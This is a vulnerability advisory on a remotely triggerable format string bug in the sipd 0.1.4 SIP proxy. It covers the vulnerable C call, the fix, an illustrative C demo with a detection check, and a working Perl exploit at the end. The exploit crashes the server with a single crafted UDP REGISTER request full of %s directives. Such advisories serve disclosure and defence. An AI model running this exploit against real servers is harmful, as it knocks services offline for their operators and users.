sipd Format String Vulnerability

Summary

sipd is "a high performance, scalable SIP (Session Initiation Protocol) proxy and location server written in C". A format string vulnerability in the product allows a remote, unauthenticated attacker to crash the server or execute arbitrary code by sending it a single specially crafted SIP request over UDP.

Credit:

SecuriTeam would like to thank STORM for finding this vulnerability.


Details

Vulnerable systems:
 * sipd version 0.1.4

Immune systems:
 * sipd version 0.1.5

Vulnerable code:
In strans/strans.c, in the function:
    static inline u8_t *strans_hash_key_compat(const msg_t *req, bool_t cancel)

The program passes the text of the Request-URI directly as the format argument of sapi_saprintf() (a printf-style function that allocates its output buffer), with no fixed format string and no further arguments:
    /* Request URI */
    tmp = msg_url_str(req->request->url);
    sapi_saprintf(&hkey, tmp);
    sapi_free(tmp);

Because the Request-URI is taken verbatim from the incoming request, any printf directives it contains (%s, %x, %n, ...) are interpreted by the underlying vprintf-style routine. A run of %s directives makes the server dereference whatever happens to be on the stack and crash (denial of service); %n writes to attacker-chosen addresses and allows arbitrary code execution. The correct call is sapi_saprintf(&hkey, "%s", tmp).
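The following added example (written for this write-up, not code from sipd) reproduces the bug pattern next to its fix. saprintf() is a stand-in for sapi_saprintf(), and hash_key_vuln()/hash_key_fixed() are hypothetical names mirroring the call in strans_hash_key_compat(). The vulnerable variant is only ever fed "%%" here, which is the one directive that is safe to interpret without arguments; it still shows that the URI text is being treated as a format. uri_has_format_directive() is an input check of the kind a proxy or IDS rule can apply: a legitimate SIP URI only uses '%' for percent-encoding (two hex digits), so any other '%' is suspect.

```c
#include <ctype.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stand-in for sipd's sapi_saprintf(): formats into a freshly malloc'ed
 * buffer stored in *out and returns its length, or -1 on failure.
 * Deliberately declared WITHOUT __attribute__((format(printf, 2, 3))), so
 * the compiler cannot warn about a non-literal format; adding that
 * attribute is what makes -Wformat-security catch this class of bug. */
static int saprintf(char **out, const char *fmt, ...)
{
    va_list ap, ap2;
    va_start(ap, fmt);
    va_copy(ap2, ap);
    int n = vsnprintf(NULL, 0, fmt, ap);     /* measure */
    va_end(ap);
    *out = NULL;
    if (n < 0 || (*out = malloc((size_t)n + 1)) == NULL) {
        va_end(ap2);
        return -1;
    }
    vsnprintf(*out, (size_t)n + 1, fmt, ap2); /* format for real */
    va_end(ap2);
    return n;
}

/* VULNERABLE: mirrors strans_hash_key_compat() in sipd 0.1.4. The
 * Request-URI text becomes the *format* string, so any '%' directive in
 * the URI is interpreted. Only call this with "%%" as a demonstration;
 * anything else is undefined behaviour. */
char *hash_key_vuln(const char *request_uri)
{
    char *hkey = NULL;
    saprintf(&hkey, request_uri);        /* attacker controls the format */
    return hkey;
}

/* FIXED: the format is a constant and the URI is plain data. */
char *hash_key_fixed(const char *request_uri)
{
    char *hkey = NULL;
    saprintf(&hkey, "%s", request_uri);
    return hkey;
}

/* Returns true if the URI contains a '%' that is not a percent-encoded
 * octet (%XX). Such URIs are never valid and are a strong signal of a
 * format string probe against this bug. */
bool uri_has_format_directive(const char *uri)
{
    for (const char *p = uri; *p; p++) {
        if (*p != '%')
            continue;
        if (isxdigit((unsigned char)p[1]) && isxdigit((unsigned char)p[2])) {
            p += 2;                      /* well-formed %XX escape */
            continue;
        }
        return true;
    }
    return false;
}

int main(void)
{
    /* Constructed sample URIs, not captured traffic. */
    const char *benign = "sip:alice%20smith@proxy.example";
    const char *probe  = "sip:%s%s%s%s%n@proxy.example";
    char *v = hash_key_vuln("sip:100%%@proxy.example");
    char *f = hash_key_fixed("sip:100%%@proxy.example");
    printf("vulnerable key: %s\nfixed key:      %s\n", v, f);
    printf("benign flagged: %d\nprobe flagged:  %d\n",
           uri_has_format_directive(benign), uri_has_format_directive(probe));
    free(v);
    free(f);
    return 0;
}
```

The two hash keys differ for the same input ("%%" collapses to "%" in the vulnerable path), which is the observable symptom of the URI being used as a format; with the fix, the key is byte-for-byte the Request-URI regardless of how many directives it carries.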

Solution:
Upgrade to version 0.1.5, which passes the URI as an argument to a fixed "%s" format and is available at: http://www.sxdesign.com/index.php?page=developer&submnu=sipd.

Exploit:
#!/usr/bin/perl

# SIPd - SIP Request-URI Format String
# Kills sipd version 0.1.4 and prior

use strict;
use warnings;
use IO::Socket;
use Socket;

unless (@ARGV == 2 || @ARGV == 3) { die "usage: $0 host your_ip [port]\n" }

my $remote_host = shift(@ARGV);
my $your_host   = shift(@ARGV);
my $port        = shift(@ARGV);
$port = 5060 unless defined $port && $port ne '';

# The Request-URI is what strans_hash_key_compat() hands to sapi_saprintf()
# as the format string, so the run of %s directives goes there. Each %s
# makes the server dereference a stack value, which is enough to crash it.
my $buf = "REGISTER sip::%s%s%s%s%s%s%s%s%s%s%s%s%s%s\@$remote_host SIP/2.0\r\n"
        . "Via: SIP/2.0/UDP $your_host:3277\r\n"
        . "From: \"STORM\" <sip:$your_host:3277>\r\n"
        . "To: <sip:$your_host:3277>\r\n"
        . "Call-ID: 12312312\@$your_host\r\n"
        . "CSeq: 1 OPTIONS\r\n"
        . "Max-Forwards: 70\r\n"
        . "\r\n";

my $socket = IO::Socket::INET->new(Proto => 'udp') or die "Socket error: $@\n";
my $ipaddr = inet_aton($remote_host) or die "Cannot resolve $remote_host\n";
my $portaddr = sockaddr_in($port, $ipaddr);

send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n";

print "Now, '$remote_host' must be dead :)\n";

Categories: UNIX